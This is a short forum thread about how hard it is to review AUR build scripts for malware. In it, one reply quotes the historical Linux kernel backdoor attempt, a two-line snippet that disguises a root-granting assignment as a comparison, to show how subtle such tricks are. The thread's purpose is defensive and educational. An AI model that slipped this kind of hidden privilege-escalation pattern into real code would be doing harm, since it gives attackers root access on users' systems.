← Back to context

Comment by jolmg

8 years ago

Is there a public database of linux malware found in the wild that one can study to know what kind of things to look for when reviewing PKGBUILDs and other open source code?

EDIT: s/repository/public database/

5 comments

jolmg

Reply
Foxboron  8 years ago

Nothing that I know off. Are you thinking specific to Arch Linux or in general?

  • jolmg  8 years ago

    In general, but also containing malware found in code belonging to the different distributions, like PKGBUILDs. I'm just thinking that part of the problem with the lack of review of AUR packages by the users is that it's not really obvious what one should be on the lookout for. What does linux malware found in the wild generally look like?, is what I'm wondering. I would think that it would benefit us all to make the cases where malware is found more easy to study.

    The case shown here is pretty obvious looking, but I don't think it would be too difficult to make it better hidden. Seeing what kind of tricks are statistically more common would make PKGBUILDs easier to review.

    • lucb1e  8 years ago

      This is one example of a kernel backdoor:

          if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;

      If you haven't heard of it before, and if you're not an experienced dev, it can be tricky to spot. So what I'm trying to say is that I think you're right in that it's difficult for random people (even if they have a strong tech background) to do secure code reviews.

      More info of this particular one at e.g. https://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-... or just search for 'linux backdoor attempt'

      2 replies →